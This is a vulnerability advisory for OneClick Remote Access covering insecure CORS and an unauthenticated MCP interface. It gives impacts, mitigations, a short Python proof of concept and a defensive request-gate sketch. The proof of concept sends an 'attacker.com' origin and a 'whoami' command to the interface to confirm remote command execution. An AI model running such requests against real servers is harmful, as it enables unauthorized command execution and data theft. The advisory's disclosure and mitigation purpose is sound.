**Vulnerability Overview**

* **Vulnerability Name:** OneClick Remote Access: Insecure CORS & Unauthenticated MCP Interface
* **Description:** This vulnerability involves insecure Cross-Origin Resource Sharing (CORS) configuration and an unauthenticated Management Control Protocol (MCP) interface in OneClick Remote Access (OCRA) software. Attackers can exploit these flaws by sending specially crafted HTTP requests to the affected server, bypassing security restrictions to execute arbitrary commands or access sensitive data without authentication.
* **CVSS Score:** 9.8 (Critical)
* **Publication Date:** 2024-08-27

**Affected Scope**

* **Affected Software:** OneClick Remote Access (OCRA)
* **Affected Versions:** All versions
* **Affected Component:** Management Control Protocol (MCP) Interface
* **Specific Impacts:**
  * **Cross-Site Request Forgery (CSRF):** Allows attackers to trick user browsers into sending malicious requests to the OCRA server.
  * **Unauthenticated Access:** Attackers can directly access the MCP interface without any authentication.
  * **Remote Code Execution (RCE):** Attackers can execute arbitrary commands via the MCP interface.
  * **Information Disclosure:** Attackers can obtain sensitive information such as system configurations and user data.

**Remediation**

* **Official Patch:** No official patch available.
* **Mitigation Measures:**
  * **Disable MCP Interface:** If not required, disable the MCP interface.
  * **Configure CORS Policy:** Restrict CORS policies to allow access only from trusted domains.
  * **Implement Authentication:** Enforce strict authentication mechanisms for the MCP interface.
  * **Network Isolation:** Isolate the OCRA server within a trusted network and restrict external access.
  * **Monitoring and Logging:** Monitor OCRA server logs to detect anomalous activities.

**POC Code**

```python
import requests

# 1. Exploiting Insecure CORS Configuration
# Send a request to the OCRA server with an Origin header
# If the server responds with Access-Control-Allow-Origin: *, a CORS vulnerability exists
response = requests.get('http://:/mcp', headers={'Origin': 'http://attacker.com'})
if 'Access-Control-Allow-Origin' in response.headers and response.headers['Access-Control-Allow-Origin'] == '*':
    print("CORS vulnerability exists!")

# 2. Exploiting Unauthenticated MCP Interface
# Send a request containing a malicious command to the OCRA server
# If the server executes the command and returns a response, an unauthenticated access vulnerability exists
payload = {'command': 'whoami'}
response = requests.post('http://:/mcp', json=payload)
if response.status_code == 200:
    print("Unauthenticated access vulnerability exists!")
    print(response.text)
```
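
The "Configure CORS Policy" and "Implement Authentication" mitigations, sketched as an added example that is not OCRA code and not part of the original advisory: a request gate for an `/mcp`-style endpoint that rejects both requests shown in the POC. The function name, trusted origin and token are hypothetical, constructed values.

```python
import hmac

# Assumptions (not from the advisory): the trusted origin and token are
# constructed sample values; authorize_mcp_request is a hypothetical helper.
TRUSTED_ORIGINS = frozenset({"https://admin.example.internal"})
API_TOKEN = "constructed-sample-token"  # load from a secret store in practice


def authorize_mcp_request(method, headers, trusted=TRUSTED_ORIGINS, token=API_TOKEN):
    """Return (status, response_headers) for a request to the /mcp endpoint."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    origin = hdrs.get("origin")
    resp = {"Vary": "Origin"}  # responses differ per Origin, so caches must key on it

    # Browser requests carry Origin; echo it only on an exact allowlist match.
    # Never answer "*" and never reflect an arbitrary or "null" origin.
    if origin is not None:
        if origin not in trusted:
            return 403, resp
        resp["Access-Control-Allow-Origin"] = origin

    # Preflight: advertise only what the endpoint needs, then stop.
    if method == "OPTIONS":
        resp["Access-Control-Allow-Methods"] = "POST"
        resp["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
        return 204, resp

    # Every non-preflight request must present the bearer token,
    # including non-browser clients that send no Origin header.
    scheme, _, supplied = hdrs.get("authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not hmac.compare_digest(
        supplied.encode(), token.encode()
    ):
        resp["WWW-Authenticate"] = "Bearer"
        return 401, resp
    return 200, resp


if __name__ == "__main__":
    # Constructed requests mirroring the two checks in the POC above.
    print(authorize_mcp_request("GET", {"Origin": "http://attacker.com"}))
    print(authorize_mcp_request("POST", {"Content-Type": "application/json"}))
    good = {"Origin": "https://admin.example.internal",
            "Authorization": "Bearer constructed-sample-token"}
    print(authorize_mcp_request("POST", good))
```
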